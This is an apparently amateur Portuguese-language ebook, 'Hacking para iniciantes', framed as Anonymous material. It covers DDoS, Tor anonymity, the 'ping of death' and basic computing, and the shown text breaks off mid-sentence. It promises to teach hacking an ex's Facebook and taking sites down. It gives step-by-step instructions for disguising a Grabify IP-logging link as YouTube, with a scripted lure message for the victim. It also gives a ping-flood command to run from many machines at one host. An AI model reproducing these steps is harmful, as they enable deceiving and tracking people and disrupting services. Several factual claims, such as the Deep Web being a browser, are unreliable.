Você está na página 1de 58

Página 1 de 58

Autor: Helexiel Wireless

HACKING PARA INICIANTES


APRESENTAÇÃO:
Olá primeiramente eu queria dizer que esse livro é exclusivo da legião anonymous sendo que
cópia ,modificação e distribuição desse livro sem a devida permissão do autor é proibido.

olá amigo, eu me chamo helexiel, e hoje sou um “hacker” da anonymous Brasil resolvir ser um
anonymous a pouco tempo antes eu não gostava da ideia mas após estar nesse mundo hacker
a mais de 3 anos conheci o imperador strik um dos hackers da anonymous ele me trouxe até
aqui ou seja me fez escrever todo esse livro. por um motivo muito importante que é ensinar
hacking a pessoas que admirem esse mundo tão perigoso e que não tenham internet para
estudar então nesse livro tem coisas que talvez os hackers mais famosos não fizeram que é
entregar tudo de bandeja enfim se você está lendo esse livro pensando em hackear alguma
coisa específica como o Facebook da sua ex ou um jogo que está na moda talvez lendo esse
livro você consiga tudo de bandeja mas vale destacar aqui que você não será hacker só lendo
esse livro então antes de você começar sua leitura você saberia me responder o que é um usb
killer ou um driver ou até mesmo a diferença entre hacker e cracker? Bom se você não sabe
você aprenderá muito ao terminar de ler esse livro então além de você aprender o que é um
driver, usb killer e saber a diferença entre um hacker e um cracker você será capaz de hackear
facebook, hackear jogos, derrubar sites e outras técnicas de invasão.

Obs: não me responsabilizo pelos seus atos e lembre-se dessa frase do tio ben “Um grande
poder exige grande responsabilidade”.

Página 2 de 58
Sumário (Conteúdo programático)
CAPITULO 1-ANONYMOUS
Tudo sobre os anonymous.................................................5

CAPITULO 2-DDOS E DOS


Introdução a ddos e dos.....................................................7
Como derrubar Sites pelo termux..........................................8

Como pegar ip de sites...........................................................9

Como pegar ip pelo site grabify............................................10

CAPITULO 3-ANONIMATO NA INTERNET


Introdução...........................................................................12

Deepweb.....................................................................13

Como ficar anônimo na internet.................................14

CAPITULO 4-PING DA MORTE


Tudo sobre o ping da morte..............................................23
Você sabia............................................................................25

CAPITULO 5-informática básica: introdução à informática


Introdução à informática.............................................27

Baseado em fatos reais...............................................31

Introdução a Microsoft word.......................................36

Você sabia....................................................................41

CAPITULO 6-TÉCNICAS DE INVASÃO


Introdução...................................................................43

Tipos de ameaças.........................................................44

Acesso a sites Spam....................................................45

Ataques à confidencialidade e integridade..................46

Pishing/Termux............................................................47

Usb killer.......................................................................48

Carding: Notas fake.......................................................49

Lucky patcher................................................................49

Como hackear wi-fi.......................................................50

Como hackear whatsapp..............................................52

Como hackear facebook ...............................................55

Uma curiosidade sobre o tema.....................................56

Página 3 de 58
Capítulo 1-Hacking Para Iniciantes
Anonymous Hacker

Resumo:
Autor: Helexiel Wireless

Nesse capítulo é ensinado tudo sobre os anonymous e dentro desse capítulo é citado o que
são , como surgiu e como se tornar um anonymous sendo que esse capítulo foi feito com o
objetivo de proporcionar ao leitor uma noção basica sobre a legião anonymous.

Página 4 de 58
ANONYMOUS
TUDO SOBRE A ANONYMOUS:
1. Oq são os anonymous
Anonymous é um grupo hacktivista internacional. Formado por membros anônimos, como o
próprio nome indica em inglês, o grupo atua em diversas frentes, geralmente "defendendo
causas em prol da sociedade", como eles costumam se posicionar. Como forma de protesto,
o Anonymous invade páginas na Internet e derruba sites.

2. Como surgiu
O grupo hacker mais famoso de todos os tempos deu seus primeiros passos dentro do 4chan,
um site com fóruns de discussão sobre qualquer assunto, até hoje em funcionamento. Em
meados de 2003, os usuários que não se identificavam nos debates tinham suas mensagens
postadas com uma simples assinatura: anonymous. Não demorou para que surgisse a ideia de
criar uma identidade que unificasse anônimos em torno de uma só representação.“Logo de
início, o primeiro agrupamento reuniu hackers, artistas e ativistas. O modo de agir dos
primeiros anons [como ficaram conhecidos] se espalhou rapidamente”, analisa Sergio Amadeu
da Silveira, doutor em sociologia e pesquisador em tecnologia da informação e ativismo hacker
na Universidade Federal do ABC (UFABC). No início, os anons agiam por pura diversão.
Invadiam plataformas de jogos infantis para incomodar crianças e zombavam de internautas
em sites de relacionamento. Aos poucos, a zoeira foi dando lugar a ações de engajamento.Foi
somente depois de algumas intervenções em nome da liberdade na rede que
os anons ganharam status de hacktivistas libertários e de ciberativistas. A primeira delas, uma
espécie de declaração de guerra contra a Cientologia, aconteceu em 2008.

3. Como me torno um anonymous


Acho que o primeiro ponto importante é definir o que o Anonymous NÃO é:
O que a Anonymous NÃO é:
NÃO somos um grupo;
NÃO somos uma organização;
NÃO somos um partido e não aceitamos nenhum tipo de apoio por parte de partidos políticos,
bem como não apoiamos nenhum;
NÃO temos líderes, porta-vozes ou representantes de nenhum tipo;
NÃO existe hierarquia de nenhuma natureza dentro da Anonymous;
Como me torno um Anon?
Você já é um anon. O que define um anon é entender e saber que existe algo de muito errado
com o mundo, estar cansado de assistir calado tanta injustiça, mentira, abuso e impunidade e
o mais importante, estar disposto a fazer algo para mudar essa realidade.

Não se "afilia" à Anonymous, ninguém pode ou quer dizer a você se e quando você é um de
nós, quando você preenche os pré-requisitos acima de um cidadão ativo você já é um anon ou
sempre foi, sabendo disso ou não.

Página 5 de 58
Capítulo 2-Hacking para iniciantes
Ddos e dos

Resumo:

Autor: helexiel wireless

Esse capítulo ensina a pegar ip e derrubar sites e utilizar o termux sendo que o principal
objetivo desse capítulo é ensinar a elaborar um ataque sendo que o aluno após ler todo esse
capítulo será capaz de ajudar a anonymous nos ataques ddos.

Página 6 de 58
DOS E DDOS
1. INTRODUÇÃO A DDOS E DOS

Caso um invasor queira deixar algum servidor indisponível ele pode gerar uma sobrecarga
no sistema, fazendo com que o servidor fique inoperante devido à alta taxa de requisições.
O atacante, por exemplo, pode sobrecarregar a largura de banda e o processamento do
servidor, deixando o servidor indisponível para o acesso. Ataques do tipo DOS (Ataque de
negação de serviços) e DDOS (Ataque de negação de serviços distribuídos) afetam a
disponibilidade do servidor ou de algum serviço específico.

Página 7 de 58
1. COMO DERRUBAR SITES PELO TERMUX:
Bom, não é tão fácil derrubar sites assim ainda mais sozinho então uma dica que eu te dou é
convide seus “amigos” para fazer ddos assim o seu ataque tem mais chances de sucesso mas
voltando ao tutorial primeiramente eu queria dizer oq é ip e oq é termux.

IP:

Endereço IP, de forma genérica, é uma identificação de um dispositivo


(computador,impressora, etc.) em uma rede local ou pública. Cada computador na internet
possui um IP(Internet Protocol ou Protocolo de internet) único, que é o meio em que as
máquinas usam para se comunicarem na Internet.

Termux:

é um emulador de terminal que garante acesso ao shell


Android, sem requerer acesso root. Em outras palavras, ele é
um app que pode ser usado como um emulador de terminal
para seu sistema Android e, consequentemente, pode ser
usado para executar comandos Linux via linha de comando
que aprimoram tarefas no seu Android, tais como: gzip, htop,
ssh, unzip, git, entre outros. Bom, agora que você já sabe oq é
ip e termux vamos para os métodos que tem para derrubar
sites pelo termux mas lembre-se existe vários métodos para
derrubar sites. Primeiro baixe o app na playstore e lembre-se tudo que vc digitar no termux
tem que ser em minúsculo porque? Problema sexual do App , então pergunte ao fabricante do
mesmo. Porém em certas ocasiões tem que colocar letras maiúsculas.

obs: se alguma hora aparecer “y/n” digite y e de enter.

Importante saber: Tome bastante cuidado com as scripts que você abre pois existem scripts
feitas para apagar arquivos do seu celular. Uma dica que eu te dou é antes de executar uma
script no termux veja quem envio ela e se não for de confiança nem abra.

Página 8 de 58
2. COMO PEGAR IP DE SITE:

Método 1:

Método 2:

Página 9 de 58
3. Como pegar ip pelo site grabify :

Como funciona:

O site grabify.link ele foi feito para pegar IP por engenharia social. Existem vários sites assim,

basicamente o site funciona assim ele faz um site que após uma semana ou menos ele some.

Primeiro passo:
Entre no site Grabify.link para fazer o site falso

obs: quando vc entrar o seu navegador vai dizer que "esse site não é seguro" e vai ter um

botão com o nome "continuar mesmo assim" Bom O SITE FOI BANIDO DA CAMADA DO

GOOGLE Por isso que aparece isso , Você pode entrar que você não vai pegar virus nem nada.

Segundo passo:
Você pode mudar o nome do site. para a vítima não suspeitar que é vírus e tals, la no site você

vai poder escolher como você quer o nome dele por exemplo vai ter as seguites opções:

YouTube etc...

Obs: Eu recomendo mudar o nome do site e colocar como YouTube

Terceiro passo:

Copia e mande para a vítima.

Exemplo de engenharia social para convencer a pessoa a entrar no seu site falso:

Se você colocou o nome do site como YouTube você diz, "Olá eu criei um canal no YouTube e

queria que vc desse uma olhada e se inscreva-se e deixa-se seu joinha, agradeço desde já "

Quarto passo:

Ir no site e ver o IP da Pessoa.

Página 10 de 58
Capítulo 3-Hacking para iniciantes
Anonimato na net

Resumo:

Autor: Helexiel Wireless

Olá eu fiz esse capítulo pois antes de saber executar: algumas técnicas de invasão, ddos e ping
da morte nada mais útil do que estudar um pouco sobre o anonimato na internet certo?!
Então ao acabar de ler esse capítulo o aluno será capaz de: Ter uma noção basica sobre o
anonimato, saber um pouco sobre a deepweb e utilizar o tor.

Página 11 de 58
ANONIMATO NA INTERNET
INTRODUÇÃO:
É fato que a internet possibilitou e muito a comunicação na sociedade porém ela trouxe alguns
problemas como o anonimato nas redes. Anonimato é o ato de uma pessoa postar algo na
internet sem se identificar ou seja aquele que não revela seu nome.

1.Anonimato na internet é proibido?


Sim, apesar do anonimato na internet ser proibido pela constituição tem-se um aumento
considerável de vitimas e,tendo em casos consequências irreversíveis e é óbvio que o
anonimato na rede deve ser discutido, pois se tornou um fato social de duas vertentes: pode
ser desejável para alguns, e indesejável para outros. É importante prezar a liberdade de
expressão nas redes, porém isso deve ser feito de forma legal, ou melhor, sem ferir os direitos
humanos.

2.Crimes cibernéticos
A Internet surgiu em plena Guerra Fria com objetivos militares para manter a comunicação das
forças armadas norte-americanas em caso de ataques inimigos que destruíssem os meios
convencionais de telecomunicações. Na década de 1970, foi criado o “protocolo internet”, ou
TCP/IP (transfer internet protocol/internet protocol) possibilitando a comunicação entre seus
usuários. Após a criação deste, foi possível comercializar a internet, facilitando o acesso de
usuários e modificando os meios de comunicação. Em 1970, surgiu o termo hacker devido ao
histórico de crimes cibernéticos, entretanto apesar de invasões a qualquer sistema seja
considerado crime surgiu subdivisões do termo.

Segundo uma apostila na Internet “O termo que melhor designaria os invasores de sistemas
seria cracker" então vamos entender melhor Isso?

3.Qual a diferença entre hacker e cracker


Hacker do bem, usa seus conhecimentos para o bem ou seja ajuda as pessoas. Cracker é do
mal, usa seus conhecimentos para invadir sistemas derrubar sites e quase sempre sem motivos
normalmente faz por diversão ou para fins lucrativos.

Página 12 de 58
DEEPWEB
A Deep Web é um navegador que permite maior privacidade de seus usuários. Era
aparentemente impossível identificar os criminosos que utilizam o navegador. Mas, em
novembro de 2014, às autoridades norte-americanas e europeias apreenderam 17 pessoas e
tiraram do ar 414 serviços “anônimos” protegidos pela rede Tor. A segurança da rede atrai
conteúdos e serviços seriam censurados na web comum. Deep Web, se traduzido para o
português, significa “abaixo da superfície”. Outra prisão anunciada pelo FBI foi a de Blake
Benthall, um engenheiro de software de 26 anos ele foi acusado de manter e administrar o site
Silk Road 2.0, sucessor do site de venda de drogas Silk Road.

Existem diversas formas de acessar a Deep Web, ela é composta por várias redes separadas,
que não conversam entre si. Apesar da rede mais conhecida ser o Tor ela também pode ser
acessada pelo 12P, Freenet, OneSwarm, dentre outros. Para acessar os sites escondidos na
Deep Web não tem um buscador convencional como o Google, então é preciso procurar um
diretório de sites. Como a Deep Web não é censurada, ela é cheia de conteúdos ilícitos, isso
inclui pornografia infantil, encomendas de assassinatos e venda de drogas não legalizadas. É
importante tomar algumas precauções pois os governos podem monitorar o Tor e o usuário é
responsável pelos atos cometidos na rede. Ao acessar a Deep Web deve-se tomar cuidado em
relação à segurança do seu dispositivo eletrônico, pois há malwares injetados em páginas
aparentemente inocentes.

O navegador Tor é uma opção gratuita que protege a comunicação, essa passa por pelo menos
três rotas diferentes e alternativas. Essas rotas dificultam a localização do usuário e por isso é a
melhor forma de se manter “anônimo”. Navegar em modo anônimo comum (utilizando
ctrl,shift e N) não grava seu histórico no computador, mas sua localização pode ser rastreada.

Veja a imagem a seguir:

Página 13 de 58
COMO FICAR ANÔNIMO NA INTERNET
Primeiro não fale seu nome pra ninguém, Segundo no mundo hacker você não tem amigos,
Terceiro não confie em ninguém. Essas são as primeiras regras pois já teve um hacker na
deepweb que citou o nome dele em um fórum e foi preso pela polícia então de nada adianta
você está 100% anônimo e não seguir essas regras. Vale ressaltar aqui que não existe 100% de
anonimato já que os endereços IP, a princípio, podem ser rastreados e associados ao
computador através do qual o conteúdo de uma mensagem ou site foi alterado (embora não
identifique diretamente o usuário). Serviços de ocultação de identidade, como
o I2P, Freenet e The Onion Router dificultam o rastreamento do endereço IP, utilizando
tecnologias de computação distribuída e encriptação , o que pode garantir maior segurança
que um serviço onde um ponto central exista.

Outro método utilizado para dificultar o rastreamento são os VPN e proxys bom basicamente
funciona assim Essas tecnologias permitem que o tráfego passe por outro computador antes
de se comunicar com o destinatário, revelando um IP que não corresponde ao do usuário vale
ressaltar aqui que é possível rastrear a origem.

1. O que é uma VPN?


Uma Rede Virtual Privada é uma conexão de rede que o possibilita criar uma conexão segura
em outra localização, fazendo com que você apareça como se estivesse em outro lugar. Seu
computador cria um túnel virtual criptografado no servidor VPN e toda a sua navegação
aparece como se estivesse sendo originada a partir de um servidor VPN. Todo o tráfego da
internet passa por esse túnel criptografado, evitando que seus dados fiquem expostos a
espiões entre o seu computador e o servidor VPN.Desvantagens:É fundamental que você
escolha um serviço de VPN de qualidade, que não armazena seus dados ou logs de
comunicação. Se um órgão governamental exigir que o provedor de VPN revele os logs, os
usuários passam a ficar expostos. Além disso, é importante que o serviço de VPN implemente
um balanceamento de carga adequado e uma randomização de servidores para que os
usuários possam sempre se conectar a um servidor VPN diferente.A PIA não armazena logs de
dados de comunicação para que suas informações fiquem sempre protegidas. 
2. O que é um Proxy?
Um proxy, como uma VPN, direciona seu tráfego por meio de outro computador em vez do
seu próprio. Enquanto há servidores proxy públicos e privados, apenas proxies públicos,
normalmente pagos, fornecem algum tipo de estabilidade ou confiabilidade.Desvantagens:Os
protocolos de proxy primários em uso hoje são SOCKS e HTTP/HTTPS. Proxies SOCKS e HTTP
não fornecem criptografia, enquanto que proxies HTTP oferecem o mesmo tipo de criptografia
que qualquer site SSL. No entanto, os proxies não foram desenvolvidos para proteger todo o
seu tráfego de internet, eles normalmente protegem apenas o navegador. Além disso, muitos
proxies passam o endereço IP original do usuário para o site de destino, tornando-os
inadequados para usuários preocupados com privacidade ou segurança. Finalmente, os proxies
devem ser configurados separadamente para cada aplicativo (e-mail, navegador, aplicativo de
terceiros) e alguns aplicativos podem não ser compatíveis. 

3. O que é o Tor?
A rede Tor é um projeto de software livre que permite que você navegue a internet de forma
anônima, e também ajuda você a ultrapassar censuras na internet e a proteger a sua
privacidade.

Página 14 de 58
Essa rede é formada por diversos servidores (computadores) rodando o software que monta a
rede Tor (core Tor). Esse servidores são operados por voluntários/as espalhados/as pelo
mundo. Quando você se conecta à essa rede e tenta através dela acessar um site, tipo
twitter.com, seu pedido entra nessa rede e passa por três desses servidores e é do terceiro que
vai sair o seu pedido para ver esse site. Então, se esse terceiro está na Espanha, twitter.com vai
pensar que você está acessando o site deles da Espanha.

Tor significa ‘The Onion Router’ ou ‘O Roteador Cebola’. Essa definição vem de que toda vez
que se estabelece essa conexão entre três servidores, a conversa entre cada um desses pontos
é criptografada. Dessa forma, o terceiro servidor não tem ideia do que foi comunicado entre o
primeiro e o segundo servidor, ou até mesmo entre o usuário e o primeiro servidor. Cada parte
dessa comunicação é isolada numa camada de criptografia, por isso o nome cebola, por causa
das ‘camadas da cebola’.

4. Como utilizar o tor


Bom eu poderia só mandar o link de um site que ensina a usar o tor mas o objetivo desse livro
não é mandar links de tutoriais e sim o de possibilitar a pessoa a estudar sem internet. Então
eu vou fazer esse conteúdo baseado no site https://antivigilancia.org/pt/2017/05/orbot-
orfox-2/ Sendo que não será necessário que você entre nele para aprender mas se você
preferir entrar não tem problema.

O gráfico abaixo mostra como funciona uma conexão feita pela rede Tor :

Página 15 de 58
Agora que você já sabe como que a rede Tor funciona, vamos falar sobre como que você pode
usá-la quando estiver usando o seu celular Android.

Você pode usar um aplicativo chamado Orbot para estabelecer essa conexão com a rede Tor
tornando muito fácil para apps no seu celular se conectarem na rede. O Orbot está disponível
no Google Play Store, clique em ¨instalar¨ e depois em ¨abrir¨.

Uma vez com a app aberta, clique em ‘Iniciar’ para iniciar a conexão com a rede Tor. A cebola
cinza significa que o Orbot não está conectado. A cebola amarela significa que o Orbot está
tentando conectar à rede Tor e estabelecer aquele circuito de três servidores que ficam entre
você e a internet.

Página 16 de 58
Pode demorar um pouco para que a conexão com a rede Tor seja estabelecida.  Uma vez
estabelecida a conexão, a cebola vai ficar verde (ou verde limão); clique agora em ¨explorar¨.
Uma janela com três opções será aberta:

•instalar orfox

•Navegador padrão

•Modo apps vpn

Neste artigo nós vamos optar primeiro por ‘Instalar Orfox’. Orfox é um navegador que passa
toda a conexão que você faz ao acessar um site pela rede Tor, garantindo desta forma o seu
anonimato ao acessar esses sites. Esse será o seu ‘navegador seguro’, mas lembre-se, o Orbot
precisa estar ligado e conectado para o Orfox funcionar.

Ao clicar no “Instalar Orfox” a app do Play Store abrirá já na página do Orfox. Clique em
¨instalar¨ e depois ¨abrir¨.

Página 17 de 58
Uma telinha aparecerá lhe dando as boas-vindas. Já que um dos features de segurança do
Orbot é não deixar que a tela do navegador possa ser capturada, mostramos aqui uma foto de
um celular mostrando essa tela (o Orfox é um projeto relativamente novo mas que promete
muito; infelizmente essa tela ainda não está traduzida).

Se você abrir o Orbot novamente, e ele estiver conectado à rede Tor, com a cebola verde,
quando você clicar em ‘Explorar’ no Orbot, o navegador Orfox abrirá em uma página que
confere se você está conectado à rede Tor ou não. Se você estiver conectado, a mensagem
estará em verde e abaixo você verá o endereço de IP que você tem dentro da rede Tor. Esse
endereço é na verdade o IP do terceiro servidor, daqueles três por onde passa sua conexão

dentro da rede Tor antes de acessar um site.

Se você não estiver conectado à rede Tor, a mensagem estará em vermelho e o endereço de IP
será o seu endereço normal, não o de um servidor da rede Tor.

Às vezes você quer obter um IP novo: para isso basta que você passe o seu dedo por cima da
cebola verde, fazendo ela girar. Esse movimento faz com que o Orbot estabeleça uma conexão
nova com outros servidores da rede Tor, e desta forma você terá um novo IP.

Página 18 de 58
Mas nem tudo o que você faz no celular envolve o navegador. Na verdade você usa mais apps
do que o navegador. Por isso temos a função de VPN no Orbot. Por exemplo, quando o
WhatsApp foi bloqueado no Brasil, se você tivesse o Orbot instalado, você poderia ter ativado
a função de VPN para o WhatsApp usar a rede Tor ao se conectar na Internet, passando assim,
por cima do bloqueio.

VPN significa ‘rede virtual privada’; você pode ativar essa função clicando no ícone de menu no
topo esquerdo da tela do Orbot. Um menu será aberto com várias opções é só clicar na de VPN
para ativá-la.

Atenção: Essa função precisa da versão do Android 5 ou outra superior, mas como o Android já
está na versão 8, ela roda em boa parte dos celulares Android atuais.

Quando você ativa a função VPN, uma janela abrirá listando todas as apps instaladas no seu
celular. Você pode clicar no botão abaixo no canto esquerdo para selecionar todas as apps, ou
buscar na lista por apps específicas que você quer que sempre estejam usando a rede Tor.
Marcar apps específicas é melhor para você ir se acostumando.

Página 19 de 58
Dica: Sempre que uma pessoa que você não confia muito te enviar um link de determinado
site e você confiar nela digamos 90% você pode ativar o tor e entrar anônimo no site.

Observe as imagens a seguir:

Note que nos prints acima o senhor dos travas envio um link e na mensagem disse que ele
acabou de criar um canal no youtube sendo que era mentira isso foi um teste elaborado no
grupo pelos administradores. Sendo que duas pessoas entraram no link sem ao menos usar o
tor ou qualquer método de esconder o ip. Bom dependendo do link que o atacante envia para
a vítima o mesmo pode invadir a câmera do celular ,formatar o celular ou até mesmo ter
domínio total sobre a máquina da vitima. Isso eu vou ensinar como que se faz no volume 3
então eu não quero me aprofundar muito nesse assunto agora.

Página 20 de 58
Capítulo 4-Hacking para iniciantes
Ping da morte

Resumo:

Autor: Helexiel Wireless

Um dos ataques mais conhecidos atualmente é o ataque de ping da morte. Vale destacar aqui
que esse metodo é meio que obsolento. então é claro que nesse livro eu não deixaria de citar
ele, enfim o leitor após terminar de ler esse capítulo será capaz de elaborar um ping da morte
e saber como funciona.

Página 21 de 58
PING DA MORTE
1. Tudo sobre o ping da morte
O que é ping
O comando ping ajuda a verificar a conectividade no nível IP, o ping envia solicitações de eco
ICMP para um host de destino (definido através de um nome ou endereço IP) para verificar se
a máquina em que se executou o comando pode conectar-se à rede e a recursos de rede
TCP/IP. A tela a seguir mostra o uso do comando ping para testar a conexão com a internet,
nessa imagem o ping está sendo executado para o Google:

Para executar esse teste ping basta digitar "ping www.google.com" e dps pressionar "enter".

O que é o ping da morte?


Por padrão o ping é executado 4 vezes com pacotes de 32bytes de dados, o ping da morte
consiste em solicitações ping com um tamanho de pacote muito elevado (geralmente de
65500 bytes) e numa freqüência também alta (milhares de vezes por segundo).Devido à
grande taxa de transmissão, existe a sobrecarga do micro de destino (podendo até chegar a
travá-lo, como no caso do Windows 95) e a sobrecarga da rede.

Como fazer o ping da morte?


Para efetuar um ping da morte digite no prompt:

ping -i 1 -l 65500 (host) -t onde:

-> ping - o comando propriamente dito

-> -i 1 - o intervalo entre cada ping. Nesse caso, 1 ms.

-> -l 65500 - o tamanho do pacote, em bytes

-> host destino

-> -t enviar a requisição por tempo indeterminado até o usuário cancelar pressionando

CONTROL + C.

Página 22 de 58
Veja a tela a seguir:

Nessa tela o comando ping foi executado apenas 10 vezes para mostrar seu funcionamento,
mas para um "ataque" com o ping da morte você deveria fazer ele em várias instâncias do
prompt ao mesmo tempo e também vários computadores ao mesmo tempo executando o
mesmo comando, todos tendo um único host como alvo.

Como dito, atualmente todos os computadores e servidores já estão "imunes" ao ping da


morte, o máximo que pode ocorrer ao executar tantas vezes é existir perda de alguns pacotes
devido ao grande tráfego na rede gerado, mas a máquina dificilmente irá parar de responder e
travar, como ocorria antigamente.

Página 23 de 58
VOCÊ SABIA?

FAKE NEWS significa "notícias falsas". São as informações noticiosas que não representam a
realidade, mas que são compartilhadas na internet como se fossem verídicas, principalmente
através das redes sociais.

Página 24 de 58
Capítulo 5- Hacking para iniciantes
Introdução à informática

Resumo:

Autor: Helexiel Wireless

Esse capítulo fala sobre a evolução dos computadores, componentes do computador e ainda
ensina um pouco sobre o Microsoft word desde oq é word, como criar documentos com
modelos e como salvar um documento e algumas dicas etc... Sendo que após o aluno terminar
de ler esse capítulo ele será capaz de diferençiar software de hardware e saberá um pouco
sobre a ferramenta word.

Página 25 de 58
Informática
Introdução à informática:
1. Introdução:
Bom é claro que o nome do livro é hacking para iniciantes então hacking não é só limitado a
técnicas de invasão etc... ó termo hacking vai muito além disso por exemplo: Matemática,
Português, Física , inglês e até administração então se você não sabe um pouco sobre
informática você nunca vai ser um hacker mas você terminando de ler esse capítulo já é um
bom começo.

Quero deixar claro aqui que eu não fiz esse capítulo sem antes ler alguns pdf na internet então
eu procurei estudar e tentar deixar tudo nesse capítulo bem explicado e as informações certas
por isso eu vou fazer esse capítulo de introdução a informática baseado em outros pdf na
internet mas vale ressaltar aqui que eu vou colocar algumas coisas nesse capítulo que eu não
achei nas apostilas por aí sendo que na minha opinião deveria ter.

Mas voltando ao assunto.....

Este capítulo trás os conceitos iniciais para a compreensão do mundo da informática. Aqui
ficará clara a evolução das tecnologias computacionais através das décadas desde sua
concepção, além da distinção das partes física e lógica do computador entendidas como
hardware e software.

2. Evolução dos computadores


A evolução dos computadores ocorreu conforme a evolução da tecnologia, compondo-se de
equipamentos mais baratos, sofisticados e eficientes. A Tabela 1 ilustra a evolução da
tecnologia utilizada nos computadores no decorrer do tempo.

A última geração que chamamos de “computadores invisíveis” é, na verdade, uma mudança de


paradigma, pois a partir deste ponto os computadores estão sendo embutidos em diversos
equipamentos como: telefones, geladeiras, televisões, casas inteiras, etc.

De todos os períodos descritos na Tabela 1 apenas a partir da década de 80 que os preços do


computador reduziram, devido à integração dos componentes eletrônicos em larga escala,
tornando viável um indivíduo possuir seu PC. Antes disto, os computadores eram praticamente
exclusivos de universidades, forças militares e corporações empresariais.

Página 26 de 58
Hardware
A palavra hardware (pronúncia: rar-duer) é de origem inglesa e é utilizada para definir as
partes físicas que compõem um aparelho, seja ele um computador, uma televisão, um celular,
etc. Todo o aparato computacional o qual podemos tocar é chamado hardware.

Na ciência da computação a disciplina que trata das soluções de projeto de hardware é a


arquitetura de computadores.

Exemplos de hardware:

Página 27 de 58
Componentes do computador
Os componentes do computador são as peças que o formam, desde os “facilmente visíveis”
como o monitor até os “menos visíveis” como circuitos elétricos e chips.

Nesta seção serão apresentados os componentes internos do computador, que se alojam


dentro do gabinete (vide Figura 4).

Fonte de alimentação
Fica localizada na parte superior traseira do gabinete. O cabo de força é ligado na fonte de
alimentação que é a responsável por converter a tensão da corrente alternada (110V ou 220V)
em tensão de corrente contínua para os outros componentes do computador.

Placa mãe
Um componente vital para o funcionamento do computador. A placa-mãe fica presa ao
gabinete internamente em sua lateral, é geralmente a maior placa do sistema, que interliga
todos os componentes internos, ela é a responsável por retransmitir os comandos enviados ao
processador e retorná-los.

Página 28 de 58
Cooler
Ventilador com dissipador, próprios para refrigerar o processador, fica instalado sobre o
mesmo.

Processador
O núcleo do computador. Faz cálculos matemáticos e trata todas as informações que o sistema
transmite. Também chamando de Unidade Central de Processamento (Central Processing Unit)
CPU, propriamente dito. Fica encaixado entre a placa-mãe e o cooler.

Obs: Erroneamente o gabinete e chamado de cpu isso é errado pois cpu (central processing
Unit) e o processador propriamente dito.

Disco rígido (HD)


Ele armazena as informações e dados como:

● Fotos

● Documentos

● Vídeos

● Sistema operacional

Tudo fica gravado de forma magnética,


permanecendo ali mesmo quando o
computador é desligado.

Bom que tal conhecermos melhor o HD?

Página 29 de 58
Parte Interna – HD
1 - Pratos: são os discos onde os dados são armazenados. São feitos de
alumínio (ou de um tipo de cristal) recoberto por ummaterial magnético
e por uma camada de material protetor.

2 - Motor: componente responsável por fazer o disco girar. Geralmente


os HDs trabalham na velocidade de 5400rpm(rotação porminuto),
7200rpm e os mais recentes a 10000rpm.

3 - Cabeça: contém uma bobina que utiliza impulsos magnéticos para


manipular as moléculas da superfície do disco e, assim,gravar dados. A
cabeça de leitura e gravação não toca nos discos.

4 - Braço: função de posicionar os cabeçotes sob a superfície dos pratos.

BASEADO EM FATOS REAIS


Eu juro

Página 30 de 58
Memória RAM
RAM (Random Access Memory) serve para armazenar dados que estão sendo trabalhados. Os
dados dos programas abertos são alocados na memória RAM, que é mais rápida que o HD.

Página 31 de 58
É importante sempre apertar o botão “salvar” nos nossos arquivos, para que eles sejam salvos
no HD, pois as informações da memória RAM são perdidas ao desligar o computador.

Drivers
São importantes para leitura e gravação em CDs, DVDs ou Blu-rays, que são formas de
armazenamento de dados, muitas vezes utilizados para manter backups de informações
importantes.

Cabos
Servem para interligar os componentes entre si, e existem vários tipos de cabos para
diferentes tipos de ligação. Exemplos:

• Cabo de força: Responsável pela transmissão de energia


elétrica entre a rede elétrica e a fonte do computador.

• Cabo de rede: Responsável pela transmissão de pacotes de


dados na rede (Internet). Exemplos de cabos de rede são:

• Cabo IDE ou
SATA: Responsável

Página 32 de 58
pela transmissão de grande volume de dados entre a placa mãe e o HD. Aqui a Tabela 2 -
Velocidade por padrão de HD apresenta a relação da velocidade de transferência destes.

• Cabo USB (Universal Serial Bus): É um cabo do tipo “plug and play” (ligar e
usar) que permite a conexão de periféricos sem a necessidade de desligar o
computador.

Placas
São responsáveis por aumentar ou melhorar o funcionamento do
computador em sua função, pois possuem recursos dedicados de processamento e de
memória.

Página 33 de 58
Software
A palavra software (pronúncia: sof-tuer) é de origem inglesa e corresponde aos diversos
programas que controlam e usam o hardware do computador.

Um programa consiste em uma série de informações que podem ser lidas pelo computador
(linguagem de máquina).

O software pode realizar várias funções, entre as mais comuns pode-se destacar:

• Jogos.

• Edição de textos, imagens, vídeos, etc.

• Reproduzir multimídias.

• Cálculos.

Os softwares podem ser classificados como:

Software de sistema
É o programa responsável por
controlar o computador, se restringe
aos Sistemas Operacionais (ou
simplesmente SO) e auxiliam o
usuário e programas na comunicação
com o hardware.

Software aplicativo
São programas que realizam tarefas,
como: edição/reprodução de
multimídia, acesso à Internet, etc.

Conclusão
Este capitulo trouxe conhecimento e esclarecimento a respeito dos diversos componentes
internos ao gabinete e sobre os programas instalados no computador.

Um jargão clássico para melhor entendimento: “Hardware é o que você chuta, software é o
que você xinga”.

Página 34 de 58
Internet
O QUE É?
É uma rede de computadores constituída por milhares de outras redes, todas interligadas
entre si;

O QUE SE PODE FAZER?


O objectivo básico da Internet consiste na partilha e divulgação de informação e na
comunicação entre os seus utilizadores;

O QUE SE PODE ENCONTRAR?


O objectivo básico da Internet consiste na partilha e divulgação de informação e na
comunicação entre os seus utilizadores;

ONDE SE ENCONTRA A INFORMAÇÃO?


Encontram-se em computadores de grandes capacidades (servidores) e de fácil acesso;

QUEM CONTROLA ESTES COMPUTADORES


Empresas especializadas que garantem o seu constante e bom funcionamento;

Como navegar na internet?


Através da utililzação de um navegador, mais conhecido como browser de internet

(ex.: Internet Explorer e Firefox);

Importante saber:

Bom antes de terminar esse assunto de introdução a informática eu queria te fazer uma
pergunta. “Como que é possível que uma máquina tão pequena consiga tirar fotos editar texto
e salve textos e consiga processar tipo eu digito um número e aparece esse mesmo número na
tela?” Acredito eu que se você é curioso com certeza já fez essa pergunta e eu (Helexiel)
também já fiz e ninguém soube me responder e eu procurei pesquisar na internet mas não
conseguir pegar de bandeja a resposta mas fui estudando e até que criei uma opinião
basicamente é assim:

Ligando-se um microprocessador(ex: processador e basicamente a calculadora) a alguns chips


de memória e alguns outros chips auxiliares, tornou-se possível construir um computador
inteiro em uma única placa de circuito. E sobre a pergunta como que é possível eu digitar algo
e apareça no monitor ? Vou fazer um resumo bem explicado basicamente a pergunta que
melhor se encaixaria para essa pergunta é “Como que o computador interpreta os dados que
